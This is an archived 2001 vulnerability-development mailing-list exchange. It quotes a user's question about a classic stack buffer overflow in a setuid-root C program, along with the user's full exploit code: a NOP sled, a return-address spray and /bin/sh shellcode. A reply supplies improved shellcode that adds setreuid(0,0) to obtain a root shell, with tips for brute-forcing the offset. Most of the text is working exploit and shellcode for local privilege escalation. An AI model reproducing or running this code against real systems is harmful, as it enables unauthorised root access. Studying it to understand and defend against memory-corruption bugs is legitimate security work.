char linuxshell[] = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0" "\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd" "\x80\xe8\xde\xff\xff\xff/bin/sh";I think you're using the wrong Shellcode... use this one: This shellcode only opens a normal shell with normal privilegies *normal* *g* so there should be a setreuid(0,0); so add this shellcode: char shell[] = "\x31\xc9\x31\xdb\x89\xc8\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31" "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; // I added the setreuid(0,0) in the shellcode as you can see at the beginning... Greets ConKing PS: To test the offset.. or to brute force it.. to get the right offset use my offsetbruteforcer under www.usad.li/robin under MY PROGRAMS ... Attention! ... It can be that you get a shell and only the same as afterwards.. then use CTRL + D until you get a root shell it should work.. the offset ist about 100 more than the buffer.... -----Ursprungliche Nachricht----- Von: roland kwitt [mailto:sniperat_private] Gesendet: Donnerstag, 17. Mai 2001 16:16 An: VULN-DEVat_private Betreff: question on an exploit hi folks, recently i found a very good howto about buffer overflowing and tried to code an exploit for a little program. ##################### Prog. to be exploited ##################### int main(int argc, char *argv[]) { char buffer[500]; if(argc>=2) strcpy(buffer, argv[1]); return 0; } As anybody can see the program does not check the size of the input copied in buffer. Therefor it should be able to exploit it and gain root access through spawning a root shell. The perms of that prog are set to: 418444 16 -rwsr-xr-x 1 root users 13335 May 17 15:22 vuln The exploit looks like this: #include <stdlib.h> #include <stdio.h> #define BUFFERSIZE 600 /* vulnerable buffer + 100 bytes */ char linuxshell[] = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0" "\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd" "\x80\xe8\xde\xff\xff\xff/bin/sh"; unsigned long sp(void) { __asm__("movl %esp, %eax"); } void usage(char *cmd) { printf("\nusage: %s <offset>\n\n", cmd); exit(-1); } int main(int argc, char *argv[]) { int i, offset, os; long esp, ret, *addr_ptr; char *buffer, *ptr, *osptr; if(argc<2) usage(argv[0]); offset = atoi(argv[1]); esp = sp(); ret = esp-offset; printf("Stack pointer: 0x%x\n", esp); printf(" Offset: 0x%x\n", offset); printf(" Return addr: 0x%x\n", ret); if(!(buffer = malloc(BUFFERSIZE))) { printf("Couldn't allocate memory.\n"); exit(-1); } ptr = buffer; addr_ptr = (long *)ptr; for(i=0; i<BUFFERSIZE; i+=4) *(addr_ptr++) = ret; for(i=0; i<BUFFERSIZE/2; i++) buffer[i] = '\x90'; ptr = buffer + ((BUFFERSIZE/2) - (strlen(linuxshell)/2)); for(i=0; i<strlen(linuxshell); i++) *(ptr++) = linuxshell[i]; buffer[BUFFERSIZE-1] = 0; execl("./vuln", "vulnerable", buffer, 0); return 0; } As a tried to execute the exploit using "exploit 0" (offset) the only thing i got was an ordinary user shell but not a root shell. Can somebody tell me why the setuid flag is ignored!! Thanks, sniper!!
This archive was generated by hypermail 2b30 : Mon May 21 2001 - 09:49:55 PDT